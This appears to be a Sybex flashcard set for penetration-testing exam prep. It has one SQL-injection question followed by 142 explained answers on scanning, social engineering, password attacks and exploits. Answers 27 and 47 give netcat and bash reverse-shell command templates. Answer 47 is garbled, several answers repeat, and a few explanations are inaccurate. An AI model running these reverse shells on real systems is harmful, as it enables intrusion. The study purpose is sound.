Sybex Flashcards

Question

You have just concluded a penetration test for a client. In your findings, you report that a web application that was developed in-house and that the organization uses to manage customer orders is susceptible to SQL injection attacks. What should you recommend the client do to remediate this? A. Escape data. B. Implement SSL for network communications. C. Require 2FA when authenticating users. D. Salt the hash.

Answer 1

1. A. In this scenario, you could recommend that the application be rewritten such that data is escaped. Escaping is the process of securing data by stripping out unwanted information, such as malformed HTML or script tags. This prevents data from being seen as code. Escaping data helps secure information prior to rendering it for the end user and helps prevent SQL injection as well as cross-site scripting attacks.

Answer 2

1. D. The timeline for the engagement and when testing can be conducted will have the biggest impact on the observation and testing of the client’s systems during peak hours. Some assessments will be scheduled for noncritical time frames to minimize the impact of any potential outages, while others may be scheduled during normal business hours to help test the organization’s reaction to attacks.

Answer 3

1. C. A hardwire connection to an organization’s internal LAN is an example of somewhere you are. Authentication may or may not be allowed based on this factor.

Answer 4

1. A and D. The whois and nslookup utilities can be used to passively conduct reconnaissance on the target organization. Because they report information that is available to the general public, using these tools is highly unlikely to arouse any suspicion.

Answer 5

1. A. The SNMP protocol runs on UDP port 161.

Answer 6

1. A. The tester implemented a cold boot attack. By booting to Linux from the flash drive, she was able to bypass many of the Windows security mechanisms and access key files.

Answer 7

1. A. This device is vulnerable to a weak credentials exploit because the administrative username and password are easy to guess.

Answer 8

1. A. In this scenario, the PowerShell command given will execute a remote script. By using the PowerShell IEX command, it will invoke an expression. The IEX cmdlet evaluates or runs a specified string as a command and returns the results of the expression or command. The PowerShell Invoke-Command cmdlet runs commands on a local or remote computer and returns all output from the commands, including errors. By using a single Invoke-Command command, you can run commands on multiple computers.

Answer 9

1. B. A nation state threat actor has been given the “go ahead” to hack. They work for a government to disrupt or compromise target governments, organizations, or individuals to gain access to valuable data or intelligence and can create incidents that have international significance. A script kiddie is an individual who carries out an attack using code written by more advanced hackers. A hacktivist usually attacks targets to make a political statement. An organized crime threat actor is a group of cybercriminals whose goal is financial gain.

Answer 10

1. B and D. Both Patator and Aircrack-ng utilities can be used to conduct brute-force password attacks. Patator can be used to compromise a variety of network services, such as FTP, SNMP, and SSH servers. Aircrack-ng is used to brute-force wireless networks.

Answer 11

1. D. A state-sponsored attacker usually operates under the direction of a government agency. The attacks are usually aimed at government contractors or even the government systems themselves. A script kiddie is an individual who carries out an attack using code written by more advanced hackers. A hacktivist’s attacks are usually politically motivated. An organized crime threat actor is a group of cybercriminals whose main goal is financial gain.

Answer 12

1. B. Using nmap’s basic functionality is quite simple. Port scanning a system just requires that nmap is installed and that you provide the target system’s hostname or IP address. By default, nmap scans the 1,000 most common ports for both TCP and UDP. However, the full range of ports available to both TCP and UDP services is 1–65,535.

Answer 13

1. D. Stored cross-site scripting (XSS) is the most dangerous type of cross-site scripting. Web applications that allow users to store data are potentially exposed to this type of attack. Stored XSS occurs when a web application gathers input from a user which might be malicious and then stores that input in a data store for later use

Answer 14

1. C. In this example, the nmap utility was used to run a UDP scan. The nmap 10.0.0.1 –sU command can be used to run this kind of scan. Note that the output of the command looks almost identical to the output of a TCP SYN scan; however, it lists UDP ports instead of TCP ports.

Answer 15

1. D. Credentialed scans require read-only access to target servers. The client should follow the principle of least privilege and limit the access available to the tester. You should consider asking for a specific “audit” account to be created with similar read-only access. A dedicated “audit” account has the advantage of showing up in the logs and instantly being recognized by everyone in IT as a potentially approved activity.

Answer 16

1. B. The Social Engineer Toolkit (SET) is an open source penetration testing utility designed to conduct social engineering exploits.

Answer 17

1. A. The first response to your observation of outdated servers would to be to investigate whether this creates any vulnerabilities that you could exploit later in your penetration test. Then, you should recommend that the client upgrade their server in your final report.

Answer 18

1. A. Any CVSS score less than 4.0 is considered to be in the Low Risk category. Therefore, a CVSS score of 3.8 indicates that this is a low-risk vulnerability.

Answer 19

1. B. Leveraging an open SMTP service to send unauthorized email messages is called SMTP relay. Most new systems have provisions in place to prevent this from happening, but many older server systems do not.

Answer 20

1. B. An if/then flow control structure in PowerShell uses the following syntax: * if *condition* { * *commands...* * } Else { * *commands...* * }

Answer 21

1. C and E. Compliance scanning focuses on the configuration settings or the security hardening that is being applied to a system. When a compliance scan is performed against a single computing system, it produces a report that defines how well the system is hardened against the selected compliance framework. Compliance scans are not designed to locate vulnerabilities in software applications or operating systems but are designed to locate and assess vulnerabilities in system hardening configurations. In this scenario, since you are seeing more assets on the network than what was provided in the network architecture, you can attribute that to having limited network access or storage access.

Answer 22

1. D. When creating your written report of findings after completing a penetration test, you should report your risk ratings in the Metrics and Measures section. These ratings allow the reader to prioritize risks as well as make comparisons between penetration tests conducted over time.

Answer 23

1. C. Hydra is designed to include support for NTLM hashes as a password. Hashcat is a password cracking and recovery tool. Drozer is a framework for Android security assessments. Kismet is an 802.11 layer 2 wireless network detector, sniffer, and intrusion detection system. Hydra, often known as thc-hydra, is a brute-force dictionary attack tool that is designed to work against a variety of protocols and services.

Answer 24

1. C. In this scenario, you linked several exploits together to compromise the target system. This is called *exploit chaining*.

Answer 25

1. C. When the sticky bit permission is assigned to a directory on a Linux system, then users can delete files only within the directory for which they are the owner, even if they have write and execute permissions to that directory.

Answer 26

1. D. The “Maximum password age” Group Policy setting determines how long a user can keep the same password before being required to change it to a new one. Once that time period has elapsed, the user is forced to create a new password.

Answer 27

1. B and C. Netcat is an open source network debugging and exploration utility that can read and write data across network connections, using the TCP/IP protocol. Netcat is also a popular remote access tool, and it has a small footprint that makes it easily portable to many systems during a penetration test. Setting up a reverse shell with netcat on Linux looks like this: nc [IP of remote system] [port] -e /bin/sh * Setting up a reverse shell with netcat on Windows looks like this: nc [IP of remote system] [port] -e cmd.exe * It is also fairly easy to set up netcat as a listener by using this: nc -l -p [port] * Ncat is designed as a successor to Netcat and has the same functionality including a variety of additional capabilities, including using SSL, proxies, and tricks such as sending email or chaining Ncat sessions together as part of a chain to allow pivoting.

Answer 28

1. A. The hping utility is a tool commonly used by penetration testers for packet crafting. It allows you to make almost any kind of packet you want and send it to a designated host on the target network. Analyzing how the host responds can provide you with valuable information for the next phase of the penetration test.

Answer 29

1. A. Before Aircrack-ng can be used to crack the encryption on a wireless network, you must first run the airodump-ng utility on the specific channel used by the transmitting access point to collect the authentication handshake.

Answer 30

1. D. Code testing is often done using static or dynamic code analysis along with testing methods such as fuzzing and fault injection. Once changes are made to the code and it is deployed, it must be retested to ensure that the changes didn’t create any new security issues. Since you are only reviewing the code in this scenario, you will be conducting a static code analysis. Static code analysis, also known as source code analysis, is done by reviewing the code of an application. Since static analysis uses the source code, it can be seen as a type of white box testing with full visibility. This can allow testers to find problems that other tests might fail to spot.

Answer 31

1. D. The default port used by the IMAP service is 143. The IMAP protocol is used by email servers to transfer messages between the mail server and mail clients.

Answer 32

1. A and E. There are two major benefits of using internal teams to conduct penetration tests. First, they have contextual knowledge of the organization that can improve the effectiveness of the tests. Second, it’s usually less expensive to conduct testing using internal employees than it is to hire a penetration testing contractor. When the internal staff isn’t involved in a penetration test, they can work on other projects for the organization.

Answer 33

1. A. Budgeting is a key factor of the business process of penetration testing. A budget is required to complete a penetration test and is determined by the scope of the test and the rules of engagement. For internal penetration testers, a budget may just involve the allotted time for the team to perform testing. For external testers, a budget usually starts with the estimated number of hours based on the intricacy of the testing, the size of the team, and any associated costs.

Answer 34

1. B. A voice phishing attack (also called a *vishing* attack) was used in this scenario. A vishing attack leverages a telephone call instead of email to conduct a phishing exploit. Essentially, the attacker calls a particular employee pretending to be someone else in order to get information.

Answer 35

1. C and E. Compliance scanning focuses on the configuration settings or the security hardening that is being applied to a system. When a compliance scan is performed against a single computing system, it produces a report that defines how well the system is hardened against the selected compliance framework. Compliance scans are not designed to locate vulnerabilities in software applications or operating systems but are designed to locate and assess vulnerabilities in system hardening configurations. In this scenario, since you are seeing more assets on the network than what was provided in the network architecture, you can attribute that to having limited network access or storage access.

Answer 36

1. B. Fuzz testing involves sending random, unexpected, or invalid data to the inputs of an application to test how it handles that data. This is called *exception handling*. Many attacks can be deployed that exploit an application’s inability to properly handle unexpected data.

Answer 37

1. B. To harden a Linux-based server system, you should make sure you use SSH instead of Telnet for remote access to the system. SSH encrypts all network traffic between the SSH server and the SSH client. Telnet, on the other hand, transmits all data as clear text, including authentication credentials.

Answer 38

1. E. In this scenario, a red team penetration test is being conducted. A red team assessment usually has narrow objectives, rather than trying to comprehensively identify and test all possible vulnerabilities. A red team assessment may use a coordinated attack coming from many different vectors to achieve those objectives. The team may be allowed to use a wide variety of tools and techniques to accomplish this, including technological, physical, and social exploits.

Answer 39

1. D. In a fragmentation wireless attack, a small amount of keying material is extracted from a captured packet. Then, an ARP packet is sent with known content to the access point. If the packet is echoed back by the AP, then even more keying information can be obtained from the returned packet. If this process is repeated over and over, the entire wireless key can be exposed.

Answer 40

1. A. In this example, the nmap utility was used to run a TCP ACK port scan. The nmap 10.0.0.1 –sA command can be used to run this kind of scan.

Answer 41

1. B. The risk associated with enabled serial console connections on network devices is the fact that network administrators tend to not secure them properly. Because they can be accessed only with a direct point-to-point connection, they don’t configure them to require authentication. Using impersonation, this makes it easy for a penetration tester to access the device, as long as they can get physical access to it.

Answer 42

1. B. A Computer Emergency Response Team (CERT) focuses on security breach and denial-of-service incidents, providing alerts and incident-handling and avoidance guidelines. CERT also conducts an ongoing public awareness campaign and engages in research aimed at improving security systems.

Answer 43

1. B. Before you can capture packets on a wired network, your network interface must be configured to run in promiscuous mode. Otherwise, it will discard all frames it receives that are not addressed specifically to its address.

Answer 44

1. A and C. After a penetration test, it is imperative that you undo everything you have done to your client’s network. So, if you have created any shells, they need to be removed. It is also important to document everything you’ve done while conducting the testing. That way, you don’t accidentally forget something. The goal is to put everything the way it was prior to your testing.

Answer 45

1. A. Much like Shodan, Censys is a security-oriented search engine. When you dig into a host in Censys, you will also discover geoIP information, if it is available, and a comprehensive summary of the services the host exposes providing more detailed information. GeoIP refers to the method of locating a computer terminal’s geographic location by identifying that terminal’s IP address.

Answer 46

1. C. On Linux system, the Ret2libc exploit causes the return address of a subroutine to be replaced by the address of a subroutine that is already present in a processes’ memory.

Answer 47

1. A. A reverse shell opens a communication channel on a port and waits for incoming connections. The client’s machine acts as a server and initiates a connection to the tester’s machine. This is what is done by using the following: * bash -i \>& /dev/tcp//443 0\>&1 * Given the options, A is the best option. B and C will not work because they are using the and not the . Option D is not correct because it is using the improper syntax.

Answer 48

1. C. Lock bypass is simply that: bypassing locks without picking them. In this scenario, the tester is attempting a physical security assessment with the use of an under-the-door tool, which goes underneath a door and pulls open a door handle from the inside.

Answer 49

1. C. A master services agreement (MSA) sets the overall provisions between two organizations. Many organizations also create an MSA that defines the terms that the organizations will use for work to be done in the future. This makes ongoing engagements and contracts much easier to work through. This can help organizations prevent the need to renegotiate. MSAs are common when organizations anticipate working together over a period of time or when a support agreement is created.

Answer 50

1. C. In this scenario, it would be important to put the risk tolerance of the client’s organization into the executive summary. Risk tolerance is basically how much risk an organization is willing to take on where their investments are concerned. With any type of investment, there is always risk, but how much risk one is able to withstand is their risk tolerance. This may be different for every organization. You cannot put a set value on risk tolerance.

Answer 51

1. D and E. In this example, the organization’s SSL/TLS certificate was signed using the SHA256 cryptographic hash function. In addition, it can be seen that the organization uses the IIS web server, which runs on top of Windows Server.

Answer 52

1. A. This output was created by the whois utility. This OSINT tool is used to gather public information about the target organization’s domain.

Answer 53

1. A and B. Both the stored/persistent and reflected XSS exploits are considered server-side exploits because the malicious scripts are embedded on a server. When the user views the web page, the malicious scripts run, allowing the attacker to capture information or perform other actions.

Answer 54

1. D. The –iR option causes nmap to scan a specified number of random hosts. For example, if you wanted to scan 50 random hosts, you would use the –iR 50 option with the nmap command.

Answer 55

1. C. This is also an example of DNS cache poisoning. Instead of poisoning the local DNS cache on workstations, the cache of the caching-only DNS server has been poisoned in this scenario. The poisoned records will remain in the cache until the TTL value is reached.

Answer 56

1. D and E. The EternalBlue and WannaCry exploits are facilitated by weaknesses in the SMB protocol. The EternalBlue exploit takes advantage of the fact that SMBv1 mishandles exploit packets, allowing attackers to remotely execute malicious code on the system running the SMB protocol. WannaCry is a form of ransomware that uses EternalBlue to gain access to vulnerable systems and install itself.

Answer 57

1. A. The “Store passwords using reversible encryption” policy is highly insecure. It is included in modern deployments to provide backward compatibility with older applications. A client who has this policy turned on should be advised of the security consequences and to consider upgrading to newer applications that don’t require it.

Answer 58

1. D. The recon-ng utility provides a web reconnaissance framework that allows you to conduct open source reconnaissance about an organization on the Web. In this example, all the public-facing servers associated with the domain name specified along with their IP addresses have been displayed.

Answer 59

1. A and C. To harden a Windows-based computer system, you should consider installing extra system RAM and then disable the Windows paging file. This prevents sensitive data that is supposed to be stored only in unencrypted format in RAM from being written to the hard disk page file. You should also disable any unneeded services.

Answer 60

1. A and C. When declaring a variable, PowerShell uses a syntax of $*variable\_name* = *value*. Ruby uses the same syntax when declaring a *global* variable.

Answer 61

1. A. Social engineering targets people instead of computers and relies on individuals or groups breaking security procedures, policies, and rules. Social engineering can be done in person, over the phone, by text messages, or by email. In this scenario, the attacker is using the social engineering principle of authority. They were hoping that by Sue in finance receiving an email from the president of the company, there would be no questions asked and the transfer would take place. Authority follows the belief that people will tend to obey authority figures, even if they are asked to perform objectionable acts.

Answer 62

1. D. Kerberoasting is a technique that relies on requesting service tickets for service account service principal names (SPNs). The tickets are encrypted with the password of the service account associated with the SPN, meaning that once a tester has obtained the service tickets by using a tool like Mimikatz, the tester can crack the tickets to obtain the service account password using offline cracking tools. Kerberoasting is a four-step process: 1. Scan Active Directory for user accounts with service principal names (SPNs) set. 2. Request service tickets using the SPNs. 3. Extract the service tickets from memory and save to a file. 4. Conduct an offline brute-force attack against the passwords in the service tickets.

Answer 63

1. A. Phishing attacks target sensitive information such as passwords, usernames, or credit card information. Spear phishing is aimed at specific individuals rather than a broader group. SMS phishing (or smishing) is phishing via SMS messages. SMS stands for Short Message Service. It is a way to send and receive text messages or short emails with a cell phone. An SMS attack is an attempt to obtain personal information by tricking the individual with a text message or by getting them to go to a fake website and enter personal information. In this scenario, you want to target one particular individual rather than a group.

Answer 64

1. A. A PIN is an example of something you know.

Answer 65

1. B and C. External penetration testing teams are hired for the express purpose of performing penetration tests. Because they aren’t directly employed by the organization, they tend to have a higher degree of independence. They don’t have to worry about upsetting a manager or director if vulnerabilities are discovered. In fact, they usually delight in such an event. Also, they tend to be less biased because they don’t participate in the design or ongoing maintenance of the organization’s network infrastructure.

Answer 66

1. C. The term *de-confliction* refers to the process of communicating between the client and the tester to determine whether an attack detected during a penetration test is coming from an authorized penetration tester or whether it is a real attack instigated by some third-party hacker.

Answer 67

1. B and D. When declaring a variable, both Bash and Python use the same syntax: *variable\_name* = *value*.

Answer 68

1. B. Link Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NetBIOS-NS) poisoning can provide penetration testers with the ability to obtain a man-in-the-middle position, broadening their ability to gain access and information. One of the most commonly targeted services in a Windows network is NetBIOS. NetBIOS is commonly used for file sharing.

Answer 69

1. A. After a penetration test, it is critical that you undo everything you have done. The best way to accomplish this is to carefully document everything you do as you conduct the test. That way, you will have a record of what must be restored and how it should look after the cleanup is complete.

Answer 70

1. A. Credentialed scans are scans in which the scanning computer has an account on the computer being scanned that allows the scanner to do a more thorough check looking for problems that may not be seen from the network. Credentialed scans are widely used in enterprise vulnerability management programs and are a useful tool when performing a penetration test. Credentialed scans may access operating systems, databases, and applications. Credentialed scans typically only retrieve information from target servers and do not make changes to the server itself.

Answer 71

1. C. When creating an associative array in a PowerShell script, you use the following syntax: $*array\_name*.*element\_name* = "*value*" . In this example, the line $Target.HostName = 'FS1' assigns a value of FS1 to the element named HostName within the Target array.

Answer 72

1. D. Cross-compiling code is used when a target platform is on a different architecture. The tester may not have access to a compiler on the target machine or may need to compile the code for an exploit from the primary workstation, which is not the same architecture as the target.

Answer 73

1. B and E. The ROE should specify when and how communications will occur between you and the client. Should you provide daily or weekly updates, or will you simply report when the test is complete? The ROE should also specify the behaviors allowed on the part of the target. For example, engaging in defensive behaviors such as shunning or blacklisting could limit the value of the test.

Answer 74

1. C. This is an example of a switch spoofing exploit that is used for VLAN hopping. In a switch spoofing exploit, the tester’s network board is reconfigured to emulate a trunk port on a network switch. By doing this, the real switch will think it needs to forward traffic from all VLANs to the tester’s device.

Answer 75

1. C. The “Reset account lockout counter after” Group Policy setting determines how much time must pass after a failed logon attempt before the failed logon attempt counter is reset to 0. This policy setting helps prevent brute-force attacks by significantly increasing the amount of time required to conduct the attack.

Answer 76

1. C. Badge cloning occurs when an attacker makes a copy of a valid access badge in order to enter a facility. By copying a valid badge’s RFID signature, the penetration tester in this scenario can use the fake badge to access the target organization’s facility using the authorized employee’s credentials.

Answer 77

1. A. The Browser Exploitation Framework (BeEF) is designed for this type of attack. BeEF provides an automated toolkit for using social engineering to take over a client’s web browser. You can then use various phishing and social engineering techniques to get employees to visit the site.

Answer 78

1. A and B. John the Ripper as well as Cain and Abel can be used to crack passwords from an offline database of user accounts, such as the shadow and passwd files from a Linux system.

Answer 79

1. A and D. When making a comparison between two values in a Python script to see whether they are not equal, you can use either the \<\> or the != relational operator.

Answer 80

1. D. Black box tests, sometimes called *zero knowledge* tests, are intended to replicate what an outside attacker would encounter. Testers are not provided with access to or information about an environment, and instead, they must gather information, discover vulnerabilities, and make their way through an infrastructure or systems as an attacker would.

Answer 81

1. D. Of the options presented here, the best recommendation to remediate shared local administrator credentials would be to simply randomize those credentials. Otherwise, compromising the local administrator password on one desktop would expose all the other desktops in the organization.

Answer 82

1. A. The nmap 192.168.1.2 -p- command causes the nmap utility to scan all ports on the specified host. Be aware that the scan will take some time to complete because of the number of ports involved.

Answer 83

1. C and D. PowerShell (PS) Remoting allows you to run PowerShell cmdlets remotely on other Windows systems in your network environment. Windows Remote Management (WinRM) is a system that allows Windows administrators to manage remote systems using the WS Management protocol.

Answer 84

1. A. People can be motivated to act if they think that everyone else is doing the same thing. This is called *social proof*. The (flawed) assumption is that if everyone else is doing something, it must be the right thing to do.

Answer 85

1. C. A script kiddie usually lacks the technical sophistication to mount an attack using their own tools. Instead, they typically download existing tools and run them. Because these tools are already known to the cybersecurity community, script kiddies generally pose less of a threat than the other types of actors in the adversary tier list.

Answer 86

1. D. When nmap indicates a port is *filtered*, it usually means the associated service is installed and running, but a host firewall is blocking the port.

Answer 87

1. C. A stealth scan enumerates hosts on the target network by sending them a SYN packet. If a SYN-ACK is received, then the scanner knows that the destination host exists. The SYN-ACK also contains a limited amount of information about the host that can be captured and analyzed by the scanner.

Answer 88

1. B. The term *trusted agent* refers to an individual within the target organization, typically an IT administrator or a manager, who has a direct line of communication with the penetration tester. This individual is usually responsible for de-confliction and de-escalation communications between the client and the tester.

Answer 89

1. A. Adding the TargetHost = input('Please enter a hostname:') line to a Python script causes it to accept input entered at the command line by the user and assign it to a variable named TargetHost.

Answer 90

1. A. The chage command can be used on Linux systems to automatically lock user accounts after a certain time. This prevents stale user accounts from being used by an attacker or disgruntled former employee to gain unauthorized access.

Answer 91

1. A. If the directory transversal has been allowed in the web server’s configuration, then it could potentially expose the file system of the web server to users accessing the site in a web browser, including directories outside of the web server’s root directory. For example, the Apache web server can be run in a chroot jail to prevent users from accessing directories outside of the web server’s directories.

Answer 92

1. D. Race conditions occur when the security of a code segment depends upon the sequence of events occurring within the system. The time-of-check-to-time-of-use (TOCTTOU) issue is a race condition that occurs when a program checks access permissions too far in advance of a resource request.

Answer 93

1. A. Interrogation involves questioning an employee of the target organization, using fear as a motivation to gather information. Interrogation is not a technique that is typically used by penetration testers because it would likely result in criminal charges against the tester as well as civil litigation.

Answer 94

1. D. This is an example of a pass-the-hash exploit. In this exploit, the tester captures hashed NTLM user credentials and then reuses them to authenticate at a later point in time to a Windows system. Because NTLM authentication uses hashed credentials, the tester doesn’t need to know the victim’s actual username and password. The hashed credentials are sufficient to create a new authenticated session.

Answer 95

1. C. An if/then flow control structure in Bash uses the following syntax: * if *condition* then * *commands...* * else * *commands...* * fi

Answer 96

1. B. Shodan is a popular security search engine and provides prebuilt searches as well as categories of search for industrial control systems, databases, and other common search queries. Shodan is a search engine that lets the user find specific types of computers and devices that are connected to the Internet using a variety of filters. Some have described it as a search engine of service banners, which are metadata that the server sends back to the client. Using Shodan for penetration testing requires some basic knowledge of banners including HTTP status codes.

Answer 97

1. A. Impersonation involves disguising oneself as another person to gain access to facilities or resources. This may be as simple as claiming to be a staff member or as intricate as wearing a uniform and presenting a fake company ID. In this scenario, the attacker called the help desk technician pretending to be an employee.

Answer 98

1. A and C. Impersonation is a social engineering technique that can be used by a penetration tester to gain physical access to the target’s facility. In this scenario, the receptionist allowed the tester to access the organization’s facility because the tester appears to be from a trusted vendor. The tester also used shoulder-surfing techniques to gather sensitive information from employees.

Answer 99

1. B. A Trojan is a type of malware that provides a useful function but secretly performs malicious actions when it is run. For example, it may provide an entertaining game that the user enjoys playing. However, in the background, it could be running a keylogger, creating a backdoor, or even making the system a zombie in a botnet.

Answer 100

1. B. Adding the read TargetHost line to a Bash script causes it to accept input entered at the command line by the user and assign it to a variable named TargetHost.

Answer 101

1. B. The whois command can be used to gather information from public records about who owns a particular domain.

Answer 102

1. A. After a penetration test, it is critical that you communicate what happened and what was discovered to the client. During the attestation of findings process, you communicate detailed evidence of what you discovered to the client. The client can then use this information to remediate the problems found.

Answer 103

1. D. In a jamming attack, the penetration tester transmits a radio signal in the 2.4 GHz and/or 5 GHz frequency ranges that is powerful enough to disrupt the legitimate wireless signal. This disruption prevents users from using the wireless network. As such, this exploit can be classified as a network stress test or denial-of-service attack.

Answer 104

1. A and D. DLL hijacking and scheduled tasks can both help retain persistence for an exploit on a Windows system. DLL hijacking causes the exploit contained in the malicious DLL to be loaded every time a linked application is started. Using scheduled tasks ensures that an exploit is run on a regular basis.

Answer 105

1. B. A hacktivist’s attacks are usually politically motivated, instead of financially motivated. Typically, they want to expose perceived corruption or gain attention for their cause. A script kiddie is an individual who carries out an attack using code written by more advanced hackers. An organized crime threat actor is a group of cybercriminals whose main goal is financial gain. A nation-state threat actor acts on behalf of a nation to inflict harm on a rival nation.

Answer 106

1. B. Link Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NetBIOS-NS) poisoning can provide penetration testers with the ability to obtain a man-in-the-middle position, broadening their ability to gain access and information. One of the most commonly targeted services in a Windows network is NetBIOS. NetBIOS is commonly used for file sharing.

Answer 107

1. A. Piggybacking occurs when an intruder tags along with one or more an authorized people through a physical barrier, such as a locking door or a turnstile. This happens without the authorized person’s knowledge or consent.

Answer 108

1. B. When nmap indicates a port is *open*, it usually means the associated service is installed, is running, and is accessible through the host firewall.

Answer 109

1. B. A discovery scan identifies the operating systems that are running on a network, maps those systems to IP addresses, and enumerates the open ports and services on those systems. Discovery scans provide penetration testers with an automated way to identify hosts that exist on the network and build an asset inventory.

Answer 110

1. A and C. Because this is a gray box test, you can expect to have limited network access and limited storage access. Essentially, you can expect to have a level of knowledge and access similar to what the average employee within the organization would have.

Answer 111

1. C. Sqlmap is an open source tool used to automate SQL injection attacks against web applications with database back ends. Sqlmap is a commonly used open source database vulnerability scanner that allows security administrators to probe web applications for database vulnerabilities. For this scenario, Sqlmap is a dedicated database vulnerability scanner and is the most appropriate tool.

Answer 112

1. A. In a cross-site scripting (XSS) attack, an attacker embeds scripting commands on a website that will later be executed by an unsuspecting visitor accessing the site. The idea is to trick a user visiting a trusted site into executing malicious code placed there by an untrusted third party. In this scenario, the attacker has developed an application that will target web browsers and permit access to a user’s banking information in the process, stealing money and transferring it to another account.

Answer 113

1. B. Adding the print (TargetHost) line to a Ruby script causes it to display the value of a variable named TargetHost on the screen.

Answer 114

1. B. JPCERT is the Japanese government’s version of the U.S. government’s Computer Emergency Response Team (CERT). JPCERT maintains a website at [https://www .jpcert.or.jp/english/](https://www.jpcert.or.jp/english/) that provides a dynamic summary of current security alerts and advisories.

Answer 115

1. C. Metasploit is launched by running msfconsole from the command line. MSFconsole is located in the /usr/share/metasploit framework/msfconsole directory.

Answer 116

1. B. After a penetration test, it is imperative that you undo everything you have done to your client’s network. The best way to do this is by carefully documenting everything you’ve done while conducting the testing. That way, you don’t accidentally forget something.

Answer 117

1. B. In this scenario, you and your colleague are discussing something you have. Physical objects may be used as authentication mechanisms. Organizations seeking to protect sensitive information and critical resources should implement multifactor authentication. Multifactor authentication implementations combine two or more authentication mechanisms coming from different authentication categories. The authentication categories are something you know, something you have, and something you are.

Answer 118

1. C. Hping is a command-line tool that allows testers to generate network traffic. Hping is popular because it allows you to create custom packets. In this scenario, you will be sending TCP SYNs to TCP port 80. The -S switch asks hping to send SYN traffic, the -V switch is verbose mode, and the -p switch indicates the port.

Answer 119

1. A. The nmap 192.168.1.1 -sA command causes the nmap utility to conduct a TCP ACK scan of the specified target system.

Answer 120

1. C and E. When requesting internal architectural diagrams as a part of a white box test, you should typically be supplied with documentation such as network diagrams and facility maps. You can use this information to map out the network topology and locate key infrastructure devices, such as switches, routers, and servers.

Answer 121

1. A. The nmap 192.168.1.0/24 -sL command causes the nmap utility to scan the specified range of IP addresses for hosts. It simply lists targets to scan.

Answer 122

1. A. Implementing a mantrap at the main entrance is an example of a technological mitigation strategy.

Answer 123

1. C. In this example, you would enter **telnet 10.0.0.1 80** at the shell prompt of your Linux system to grab the banner of the target web server.

Answer 124

1. D. Attackers (and penetration testers) seek to undermine the goals of the CIA triad model using the corresponding goals of the DAD triad. The second D in DAD stands for denial, which refers to preventing the legitimate use of information or systems. In this scenario, Jessica has executed a denial of service (DoS) attack against the file server, denying legitimate access to it.

Answer 125

1. D and E. An advanced persistent threat (APT) is a prolonged targeted attack in which the attacker gains access to a network and remains there undetected for an extended period of time. As such, only an organized crime or nation-state actor is likely to have the level of sophistication and the funds required to carry out such an attack. Script kiddies, hacktivists, and malicious insiders usually lack the technical expertise and/or the funds necessary to carry out an APT.

Answer 126

1. B. Three-factor authentication (3FA) requires users to supply factors from three different categories. In this case, requiring a user to supply a username (something you know), a PIN (something you know), a fingerprint scan (something you are), and a one-time password (something you have) constitutes 3FA authentication.

Answer 127

1. A. One way to leveraging an open SMTP service to send unauthorized email messages is to connect to the SMTP server’s IP address on port 25 using a Telnet client. Once the connection has been established, you can use the command-line interface to create and send the messages.

Answer 128

1. C. Vishing (voice phishing) is social engineering over the phone system. Phishing attacks target sensitive information such as passwords, usernames, or credit card information. Vishing works like phishing but is carried out using voice technology. A vishing attack can be conducted by voice email, voice over IP (VoIP), or landline or cellular telephone. In this scenario, since the CEO is receiving telephone calls, this is a vishing attack.

Answer 129

1. D. When enumerating a target network during a white box penetration test, you will likely gather a great deal of information. For example, you will probably want to enumerate any user and group accounts that can be discovered. You will also want to enumerate any network shares that can be identified.

Answer 130

1. A. Most people will help someone they perceive to be a friend. This is called *likeness*. When someone they believe to be a friend needs help, they may bend or break the rules to help the person out.

Answer 131

1. A. Websites use HTTP cookies to keep sessions over time. If a tester is able to get a copy of the user’s session cookie, then they can use that cookie to impersonate the user’s browser and hijack the authenticated session. Attackers who are able to acquire the session cookie used to authenticate a user’s web session can hijack that session and take charge of the user’s account. Cookies used for authentication should always be securely created and transmitted only over secure, encrypted communications channels.

Answer 132

1. B. A *critical findings* communication trigger happens when a penetration tester discovers a security vulnerability so serious that it must be addressed immediately instead of waiting until the test has been completed.

Answer 133

1. C. People can be motivated to act quickly when they believe something they want is in limited supply. This is called *scarcity*. They don’t want to miss out on an opportunity, product, deal, or service that will soon become unavailable.

Answer 134

1. B. Because full connections are established with each host during a full vulnerability scan, they can be thoroughly interrogated and fingerprinted. As a result, a full scan usually produces the most accurate information. However, they are also the easiest to detect by defenders.

Answer 135

1. A and F. One of nmap’s best-known features is remote OS detection using TCP/IP stack fingerprinting. Nmap sends a series of TCP and UDP packets to the remote host and examines the responses. * -iL : This is the input from list of hosts/networks. * -sV: This probes open ports to determine service/version info.

Answer 136

1. B. The --top-ports 1000 option tells nmap to scan the default ports used by the 1,000 most popular network services. The --exclude-ports 53 option tells nmap to skip port 53 (the default port used by DNS servers) during the scan.

Answer 137

1. A. A Windows domain controller hosts many domain-related services. Therefore, most domain controllers will have many ports open. Most will include the following: * Port 88: Used for Kerberos authentication. * Port 135: Used for communications between domain controllers and clients as well as between domain controllers. * Ports 138 and 139: Used for file replication between domain controllers. * Port 389: Used for LDAP queries. * Port 445: Used for SMB/CIFS file sharing. * Port 464: Used for Kerberos password change. * Port 636: Used for secure LDAP queries. * Ports 3268 and 3269: Used for Global Catalog communications. * Port 53: Used for DNS name resolution.

Answer 138

1. B. The penetration tester is using urgency (and possibly likeness) as a motivating factor. The employee will probably comply with the request out of a desire to be seen as a “team player.” This type of attack can be made even more effective by conducting reconnaissance beforehand and identifying the names of real sales reps working for the organization.

Answer 139

1. A. Wi-Fi Protected Access 2 – Pre-Shared Key (WPA2-PSK) is a method of securing a network using WPA2 with the use of the optional Pre-Shared Key (PSK) authentication. To encrypt a network with WPA2-PSK, you provide a router with a plain English passphrase between 8 and 63 characters long. Wi-Fi deauthentication attacks are a type of denial-of-service attack that targets communication between a user and a Wi-Fi wireless access point. A tester can send a deauthentication frame at any time to a wireless access point, with a spoofed address for the victim.

Answer 140

1. B. A static code analysis (also called a *source code analysis*) is happening in this scenario. In this type of test, the tester accesses an application’s source code and reviews it for weaknesses that could be exploited. Obviously, the tester must have a strong programming background to be able to do this kind of review.

Answer 141

1. D and E. The penetration tester used shoulder surfing and business email compromise techniques in this scenario. In shoulder surfing, the tester observes information that employees type or display on their computers in an attempt to gather sensitive information. In this example, the tester used shoulder surfing to gather the employee’s email username and passwords. The tester then used the compromised account to gather information from other employees. This is called business email compromise.

Answer 142

1. B. Key stretching involves running the value to be hashed through the hash function multiple times. This increases the computation time required to hash each password, but it also dramatically increases the size of rainbow table needed for a precomputation attack to work.

Answer 143

